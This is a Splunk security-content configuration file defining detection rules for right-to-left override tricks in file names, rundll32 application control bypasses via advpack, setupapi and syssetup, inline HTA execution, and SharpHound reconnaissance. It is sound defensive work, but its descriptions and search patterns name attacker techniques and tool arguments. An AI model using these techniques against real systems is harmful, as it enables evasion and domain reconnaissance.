action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments"]
action.risk = 1
action.risk.param._risk_message = Suspicious RTLO detected in $file_name$ on endpoint $dest$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"threat_object_field": "file_name", "threat_object_type": "file_name"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect RTLO In File Name - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.002", "T1036"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E). This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.
action.notable.param.rule_title = Detect RTLO In File Name
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.file_create_time) as file_create_time from datamodel=Endpoint.Filesystem where Filesystem.file_name!=unknown by Filesystem.dest Filesystem.user Filesystem.process_id Filesystem.file_name Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | regex file_name = "\\x{202E}" | rex field=file_name "(?<RTLO_file_1>.+)(?<RTLO_exist>\\x{202E})(?<RTLO_file_2>.+)" | eval file_name_with_RTLO=file_name | eval file_name=RTLO_file_1.RTLO_file_2 | fields - RTLO* | `detect_rtlo_in_file_name_filter`

[ESCU - Detect RTLO In Process - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E). This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.002", "T1036"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E). This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Deployments in regions where the native language is written right to left.
action.escu.creation_date = 2023-04-26
action.escu.modification_date = 2023-04-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect RTLO In Process - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Spearphishing Attachments"]
action.risk = 1
action.risk.param._risk_message = Suspicious RTLO detected in $process_name$ on endpoint $dest$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 40}, {"threat_object_field": "process_name", "threat_object_type": "process"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect RTLO In Process - Rule
action.correlationsearch.annotations = {"analytic_story": ["Spearphishing Attachments"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1036.002", "T1036"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search is used to detect the abuse of the right-to-left override (RTLO or RLO) character (U+202E). This technique is used by adversaries to disguise a string and/or file name to make it appear benign. The RTLO character is a non-printing Unicode character that causes the text that follows it to be displayed in reverse.
action.notable.param.rule_title = Detect RTLO In Process
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process!=unknown AND Processes.action=allowed by Processes.dest Processes.user Processes.original_file_name Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.process_guid Processes.parent_process_id | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | regex process="\\x{202E}" | rex field=process "(?<RTLO_command_1>.+)(?<RTLO_exist>\\x{202E})(?<RTLO_command_2>.+)" | eval process_with_RTLO=process | eval process=RTLO_command_1.RTLO_command_2 | fields - RTLO* | `detect_rtlo_in_process_filter`

[ESCU - Detect Rundll32 Application Control Bypass - advpack - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur: clr.dll, jscript.dll and scrobj.dll. During investigation, identify where the script content originated. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur: clr.dll, jscript.dll and scrobj.dll. During investigation, identify where the script content originated. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may use advpack.dll or ieadvpack.dll, triggering a false positive.
action.escu.creation_date = 2021-02-04
action.escu.modification_date = 2021-02-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Rundll32 Application Control Bypass - advpack - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line was identified on endpoint $dest$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Rundll32 Application Control Bypass - advpack - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies rundll32.exe loading advpack.dll and ieadvpack.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur: clr.dll, jscript.dll and scrobj.dll. During investigation, identify where the script content originated. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.
action.notable.param.rule_title = Detect Rundll32 Application Control Bypass - advpack
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*advpack* by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___advpack_filter`

[ESCU - Detect Rundll32 Application Control Bypass - setupapi - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies rundll32.exe loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur: clr.dll, jscript.dll and scrobj.dll. During investigation, identify where the script content originated. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies rundll32.exe loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur: clr.dll, jscript.dll and scrobj.dll. During investigation, identify where the script content originated. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may use setupapi, triggering a false positive.
action.escu.creation_date = 2021-02-04
action.escu.modification_date = 2021-02-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Rundll32 Application Control Bypass - setupapi - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line was identified on endpoint $dest$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Rundll32 Application Control Bypass - setupapi - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies rundll32.exe loading setupapi.dll and iesetupapi.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur: clr.dll, jscript.dll and scrobj.dll. During investigation, identify where the script content originated. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.
action.notable.param.rule_title = Detect Rundll32 Application Control Bypass - setupapi
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*setupapi* by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___setupapi_filter`

[ESCU - Detect Rundll32 Application Control Bypass - syssetup - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies rundll32.exe loading syssetup.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur: clr.dll, jscript.dll and scrobj.dll. During investigation, identify where the script content originated. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies rundll32.exe loading syssetup.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur: clr.dll, jscript.dll and scrobj.dll. During investigation, identify where the script content originated. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may use syssetup.dll, triggering a false positive.
action.escu.creation_date = 2021-02-04
action.escu.modification_date = 2021-02-04
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Rundll32 Application Control Bypass - syssetup - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious Rundll32 Activity", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ loading syssetup.dll by calling the LaunchINFSection function on the command line was identified on endpoint $dest$ by user $user$.
action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 80}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 80}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 80}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Rundll32 Application Control Bypass - syssetup - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Rundll32 Activity", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.011"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies rundll32.exe loading syssetup.dll by calling the LaunchINFSection function on the command line. This particular technique will load script code from a file. Upon a successful execution, the following module loads may occur: clr.dll, jscript.dll and scrobj.dll. During investigation, identify where the script content originated. Generally, a child process will spawn from rundll32.exe, but that may be bypassed based on script code contents. Rundll32.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. During investigation, review any network connections and obtain the script content executed. It's possible other files are on disk.
action.notable.param.rule_title = Detect Rundll32 Application Control Bypass - syssetup
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*syssetup* by Processes.dest Processes.user Processes.parent_process_name Processes.original_file_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___syssetup_filter`

[ESCU - Detect Rundll32 Inline HTA Execution - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies "rundll32.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, the process "rundll32.exe" and its parent process.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies "rundll32.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, the process "rundll32.exe" and its parent process.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive.
action.escu.creation_date = 2021-01-20
action.escu.modification_date = 2021-01-20
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect Rundll32 Inline HTA Execution - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Suspicious MSHTA Activity", "NOBELIUM Group", "Living Off The Land"]
action.risk = 1
action.risk.param._risk_message = Suspicious rundll32.exe inline HTA execution on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect Rundll32 Inline HTA Execution - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious MSHTA Activity", "NOBELIUM Group", "Living Off The Land"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.005"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies "rundll32.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, the process "rundll32.exe" and its parent process.
action.notable.param.rule_title = Detect Rundll32 Inline HTA Execution
action.notable.param.security_domain = endpoint
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_rundll32` (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.parent_process_name Processes.original_file_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_inline_hta_execution_filter`

[ESCU - Detect SharpHound Command-Line Arguments - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following analytic identifies common command-line arguments used by SharpHound: `-collectionMethod` and `invoke-bloodhound`. Because SharpHound is FOSS, function names may be modified, but such changes depend on the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover every argument, in order to avoid false positives.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]}
action.escu.data_models = ["Endpoint"]
action.escu.eli5 = The following analytic identifies common command-line arguments used by SharpHound: `-collectionMethod` and `invoke-bloodhound`. Because SharpHound is FOSS, function names may be modified, but such changes depend on the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover every argument, in order to avoid false positives.
action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process.
action.escu.known_false_positives = False positives should be limited as the arguments used are specific to SharpHound. Filter as needed or add more command-line arguments as needed.
action.escu.creation_date = 2024-03-14
action.escu.modification_date = 2024-03-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Detect SharpHound Command-Line Arguments - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"]
action.escu.analytic_story = ["Windows Discovery Techniques", "Ransomware"]
action.risk = 1
action.risk.param._risk_message = Possible SharpHound command-line arguments identified on $dest$
action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 24}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Detect SharpHound Command-Line Arguments - Rule
action.correlationsearch.annotations = {"analytic_story": ["Windows Discovery Techniques", "Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = The following analytic identifies common command-line arguments used by SharpHound: `-collectionMethod` and `invoke-bloodhound`. Because SharpHound is FOSS, function names may be modified, but such changes depend on the operator. In most instances the defaults are used. This analytic works to identify the common command-line attributes used. It does not cover every argument, in order to avoid false positives.
action.notable.param.rule_title = Detect SharpHound Command-Line Arguments action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*-collectionMethod*","*invoke-bloodhound*") by Processes.dest Processes.user Processes.parent_process Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_sharphound_command_line_arguments_filter` [ESCU - Detect SharpHound File Modifications - Rule] action.escu = 0 action.escu.enabled = 1 description = SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. 
During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087.002", "T1069.001", "T1482", "T1087.001", "T1087", "T1069.002", "T1069"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = SharpHound is used as a reconnaissance collector, ingestor, for BloodHound. SharpHound will query the domain controller and begin gathering all the data related to the domain and trusts. For output, it will drop a .zip file upon completion following a typical pattern that is often not changed. This analytic focuses on the default file name scheme. Note that this may be evaded with different parameters within SharpHound, but that depends on the operator. `-randomizefilenames` and `-encryptzip` are two examples. In addition, executing SharpHound via .exe or .ps1 without any command-line arguments will still perform activity and dump output to the default filename. Example default filename `20210601181553_BloodHound.zip`. SharpHound creates multiple temp files following the same pattern `20210601182121_computers.json`, `domains.json`, `gpos.json`, `ous.json` and `users.json`. Tuning may be required, or remove these json's entirely if it is too noisy. During traige, review parallel processes for further suspicious behavior. Typically, the process executing the `.ps1` ingestor will be PowerShell. action.escu.how_to_implement = To successfully implement this search you need to be ingesting information on file modifications that include the name of the process, and file, responsible for the changes from your endpoints into the `Endpoint` datamodel in the `Filesystem` node. action.escu.known_false_positives = False positives should be limited as the analytic is specific to a filename with extension .zip. Filter as needed. 
